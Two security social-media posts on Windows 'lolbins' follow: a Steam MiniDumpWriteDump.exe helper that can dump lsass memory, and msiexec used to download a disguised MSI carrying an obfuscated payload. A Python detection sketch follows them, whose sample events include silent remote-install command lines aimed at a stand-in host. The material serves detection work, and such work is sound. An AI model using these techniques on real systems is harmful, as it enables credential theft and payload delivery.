Just found another interesting signed binary which can be used to dump #lsass. 🔥
Playing games a lot? Steam has a #lolbin MiniDumpWriteDump.exe in "C:\Program Files (x86)\Steam" that lets you dump process memory
Sadly works only on 32 bit systems!
#redteam #infosec
Malicious actors are using msiexec as a downloading tool. (rather than the usual download + execution)
The MSI file downloaded appears to be a Notepad++ installer with an #ostap obfuscated JavaScript payload concatenated to the end.
#lolbin #msiexec virustotal.com/gui/search/ma…
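
A detection-side sketch covering both posts above, added here as an example and not taken from either post: it checks process-creation events for msiexec being handed an http(s) package location and for any execution of the Steam dump helper. The event field names (`image`, `cmdline`), the rule names and the sample events are assumptions constructed for illustration.

```python
import re
import shlex
from ntpath import basename  # Windows path rules on any OS

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
DUMP_TOOL = "minidumpwritedump.exe"  # image name from the first post

def split_cmdline(cmdline):
    """Tokenize a Windows command line; quoted paths stay in one token."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quote: fall back to whitespace split
        return cmdline.split()

def classify(event):
    """Return the (hypothetical) rule names that fire for one event."""
    hits = []
    image = basename(event["image"]).lower()
    args = split_cmdline(event["cmdline"])[1:]  # drop argv[0]
    # msiexec given an http(s) package location: it fetches the MSI itself.
    if image == "msiexec.exe" and any(REMOTE_URL.search(a) for a in args):
        hits.append("msiexec_remote_package")
    # Any execution of the Steam dump helper is worth reviewing.
    if image == DUMP_TOOL:
        hits.append("steam_minidump_tool_executed")
    return hits

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://example.test/setup.msi"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Users\a\Downloads\npp.installer.msi" /qn'},
    {"image": r"C:\Program Files (x86)\Steam\MiniDumpWriteDump.exe",
     "cmdline": r'"C:\Program Files (x86)\Steam\MiniDumpWriteDump.exe"'},
    {"image": r"C:\Windows\SysWOW64\MSIEXEC.EXE",
     "cmdline": "MSIEXEC -package HTTPS://example.test/a.msi -quiet"},
]

def scan(events):
    """Pair each command line with the rules it triggered."""
    return [(e["cmdline"], classify(e)) for e in events]

if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(hits or "-", cmdline)
```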